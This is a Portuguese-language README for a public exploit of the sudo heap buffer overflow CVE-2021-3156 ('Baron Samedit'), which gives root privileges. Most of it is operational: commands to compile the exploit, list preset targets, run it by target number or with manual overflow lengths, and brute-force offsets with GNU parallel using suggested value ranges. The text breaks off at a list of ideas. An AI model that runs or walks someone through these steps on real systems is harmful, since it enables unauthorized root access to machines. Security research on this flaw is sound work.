
Exploração de buffer overflow baseado em heap para CVE-2021-3156 (Baron Samedit) no sudo, fornecendo escalada de privilégio para root com múltiplas configurações de alvo e descoberta experimental de alvos por força bruta.
Isto é um exploit para a vulnerabilidade sudo CVE-2021-3156 (apelidada de Baron Samedit pela Qualys).
compilar:
$ make
listar alvos:
$ ./sudo-hax-me-a-sandwich
executar:
$ ./sudo-hax-me-a-sandwich <target_number>
modo manual:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
Certifique-se de ter o GNU parallel instalado.
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
alguns valores padrão para tentar:
$ ./brute.sh 90 120 50 70 150 300
Irá consumir todos os núcleos disponíveis. Não tente netflix & brute.
Envie PRs (sensatas), talvez eu faça merge.
Algumas ideias: